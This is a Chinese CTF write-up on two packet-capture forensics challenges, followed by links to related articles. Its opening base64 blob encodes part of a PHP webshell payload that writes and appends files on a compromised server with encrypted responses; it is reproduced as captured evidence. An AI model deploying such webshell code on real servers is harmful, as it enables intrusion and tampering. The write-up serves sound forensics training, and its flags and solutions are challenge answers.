zcyIpOw0KICAgICAgICAgICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgkcGF0aC4i5Yig6Zmk5oiQ5YqfIik7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksJF9TRVNTSU9OWydrJ10pOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIGNhc2UgImNyZWF0ZSI6DQogICAgICAgICAgICAkZmlsZSA9IGZvcGVuKCRwYXRoLCAidyIpOw0KICAgICAgICAgICAgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50KTsNCiAgICAgICAgICAgIGZ3cml0ZSgkZmlsZSwgJGNvbnRlbnQpOw0KICAgICAgICAgICAgZmZsdXNoKCRmaWxlKTsNCiAgICAgICAgICAgIGZjbG9zZSgkZmlsZSk7DQogICAgICAgICAgICBpZiAoZmlsZV9leGlzdHMoJHBhdGgpICYmIGZpbGVzaXplKCRwYXRoKSA9PSBzdHJsZW4oJGNvbnRlbnQpKSB7DQogICAgICAgICAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgICAgICAgICAgICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRwYXRoIC4gIuS4iuS8oOWujOaIkO+8jOi/nOeoi+aWh+S7tuWkp+WwPzoiIC4gJHBhdGggLiBmaWxlc2l6ZSgkcGF0aCkpOw0KICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgICAkcmVzdWx0WyJzdGF0dXMiXSA9IGJhc2U2NF9lbmNvZGUoImZhaWwiKTsNCiAgICAgICAgICAgICAgICAkcmVzdWx0WyJtc2ciXSA9IGJhc2U2NF9lbmNvZGUoJHBhdGggLiAi5LiK5Lyg5aSx6LSlIik7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICRfU0VTU0lPTlsnayddKTsNCiAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICBjYXNlICJhcHBlbmQiOg0KICAgICAgICAgICAgJGZpbGUgPSBmb3BlbigkcGF0aCwgImErIik7DQogICAgICAgICAgICAkY29udGVudCA9IGJhc2U2NF9kZWNvZGUoJGNvbnRlbnQpOw0KICAgICAgICAgICAgZndyaXRlKCRmaWxlLCAkY29udGVudCk7DQogICAgICAgICAgICBmY2xvc2UoJGZpbGUpOw0KICAgICAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgICAgICAgICAkcmVzdWx0WyJtc2ciXSA9IGJhc2U2NF9lbmNvZGUoJHBhdGggLiAi6L+95Yqg5a6M5oiQ77yM6L+c56iL5paH5Lu25aSn5bA/OiIgLiAkcGF0aCAuIGZpbGVzaXplKCRwYXRoKSk7DQogICAgICAgICAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksJF9TRVNTSU9OWydrJ10pOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIGRlZmF1bHQ6DQogICAgICAgICAgICBicmVhazsNCiAgICB9DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JG1vZGU9ImNyZWF0ZSI7JHBhdGg9IkM6L3d3dy9yZWFkbWUuN3oiOyRjb250ZW50PSJOM3E4cnljY0FBUVlZNVZwUlFBQUFBQUFBQUJhQUFBQUFBQUFBQ2VWQjNFQkFFQlBheXdnVlNCbWFXNWtJSFJvWlNCbWJHRm5PZzBLWm14aFozdHVaVGRYVDFKTFgzUnlZV1ptU1dOZmFUVmZhVzUwTTNJemMybHVaMTh4TkRNek1qSXpmUUFCQkFZQUFRbEZBQWNMQVFBQklTRUJBQXhCQUFnS0FiMVFlMThBQUFVQkdRd0FBQUFBQUFBQUFBQUFBQUFSRlFCeUFHVUFZUUJrQUcwQVpRQXVBRzBBWkFBQUFCUUtBUUJjTlJydEdZZlZBUlVHQVFBZ0FBQUFBQUE9IjsNCm1haW4oJG1vZGUsJHBhdGgsJGNvbnRlbnQpOw=='));

base64解码后得出如下,但是解码后又发现又有一串base64编码,继续再解一下得出最后的真flag


N3q8ryccAAQYY5VpRQAAAAAAAABaAAAAAAAAACeVB3EBAEBPaywgVSBmaW5kIHRoZSBmbGFnOg0KZmxhZ3tuZTdXT1JLX3RyYWZmSWNfaTVfaW50M3Izc2luZ18xNDMzMjIzfQABBAYAAQlFAAcLAQABISEBAAxBAAgKAb1Qe18AAAUBGQwAAAAAAAAAAAAAAAARFQByAGUAYQBkAG0AZQAuAG0AZAAAABQKAQBcNRrtGYfVARUGAQAgAAAAAAA=

flag{ne7WORK_traffIc_i5_int3r3sing_1433223}

流量1.pcapng

打开流量包后过滤http协议并且搜索flag,发现http协议里面最后一个包有一大串base64编码,直接拿去解一下


解码后发现有一个pk头,也发现有一个文件为flag.txt


感觉看得并不是很清晰就放进010看,直接保存为一个zip


但是解压发现需要密码,幸好出题人在压缩包注释里写上压缩包密码为flagflagflagflagflag,最后直接获得flag



flag{407284cc78d4774e2d838d6fdc7c30de}

CTF的两道比较不错的流量分析题相关推荐

  1. 2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp

    2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp .0x00 前言 本人作为业余爱好者参加了2021年云南省职工职业技能大赛的网络安全比赛,比赛形式以CTF+理论考 ...

  2. CTF misc之流量分析题套路总结

    1.前言 昨天去I春秋刷了几题流量分析题,然后总结了一下流量分析题的做题方法. 2.刷题 2.1 可恶的黑客 步骤一.HTTP追踪流先了解进行什么操作 可以看到是传了webshell然后进行文件操作 ...

  3. 3CTF的两道流量分析题

    文章目录 第一道忘了叫啥了 第二道好像是叫黑客攻击啥的 方法一:使用mimikatz 方法二:利用Windows Password Recovery软件 第一道忘了叫啥了 题目链接:https://u ...

  4. 一道ctf流量分析题

    此ctf用到wireshark软件,Wireshark可以帮助解决一些问题比如:丢包.延迟.DDoS攻击.它可以将网络流量展现,并可以通过软件内部的工具对流量进行分析,从而找出问题所在,并解决问题. ...

  5. ctf php 流量分析题,GKCTF EZWEB的分析题解和思考

    GKCTF EZ三剑客-EzWeb 看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧. 嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现 ...

  6. ctf php 流量分析题,CTF平台hackit题目分析与解答

    之前在网上经常看到很多的CTF的练习平台,在加上搞CTF比赛的学弟推荐了这个 CTF平台 .当时在网上看了一下,这个平台推荐的人还是很多的.这个平台是由一个白帽子个人开发的一个平台.趁着这个平台还没有 ...

  7. 记一道USB流量分析题

    本文内容全部来自于下面两个博客: USB-HID的初步认识 从CTF中学USB流量捕获与解析 USB协议的数据部分在Leftover Capture Data域之中,在Mac和Linux下可以用tsh ...

  8. 三、Bugku----手机热点------流量分析题------obex

    一.题目: **1.**题目附件网盘链接:https://pan.baidu.com/s/17y_Zf2vLtkHEaTbH-Ngfdg //提取码:kbeg 2.题目内容: httppan.baid ...

  9. 工控流量分析题+wireshark学习

    写在前面 暑假报名了工控比赛 所以要找些工控的题目来刷刷 正好比赛方提供的靶场有很多类似的题目 开始痛苦的学习过程... Wireshark Capture filter <Protocol n ...

  10. ctf流量分析练习二

    上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量包修复.WEB流量包分析.USB流量包分析和其他流量包分析. 01 流量包修复 比赛过 ...

最新文章

  1. 沙发变身遥控器,涂鸦里藏PCB,MIT技术宅的智能家居竟然是这样
  2. 正则表达式中模式修正符作用详解(i、g、m、s、x、e)
  3. java join使用实例_Java多线程中关于join方法的使用实例解析
  4. Android平台实现Unity3D下RTMP推送
  5. mybatis 配置_配置Mybatis在Spring Boot工程中的整合
  6. 软件测试第三次作业junit和Eclemma的使用
  7. Python删除文件中含有特定值的行
  8. 梯度下降法与正规方程的比较
  9. mysql防注入方法_防止SQL注入的六种方法
  10. Python自动化结算工资和统计报表
  11. Linux 下常见的四款chm查看器比较
  12. Duplicated tag: ‘dependencies‘报错
  13. 一键修改计算机名(无需重启)
  14. 如何在项目中利用 git 提高工作效率
  15. 哈工程和杭电计算机,哈工程算名校吗?为什么说千万别来哈工程?
  16. 欢迎使用CSDN-markdown编辑器2
  17. gltf模型和glb模型下载的网站
  18. 【考研高数 武忠祥+880版 自用】高数第四章基础阶段思维导图
  19. 第四节 结构化分析方法的概念
  20. python No dq3d python package, filterreg deformation model not available.

热门文章

  1. 2013.12.26 M-Learning
  2. 安卓一键清理内存_雨点清理安卓版下载-雨点清理官方版下载v1.0
  3. python web微信应用(六) 监测微信撤回的消息
  4. MATLAB 使用GUI设计简单的计算器
  5. ITIL 4Foundation认证
  6. PDF转Word图片转Word教程(附工具地址)
  7. 2022山东省安全员C证复训题库模拟考试平台操作
  8. springboot项目制作漂亮的banner
  9. ArcGIS Server 服务启动停止解决方法
  10. cocoscreator中tween详细用法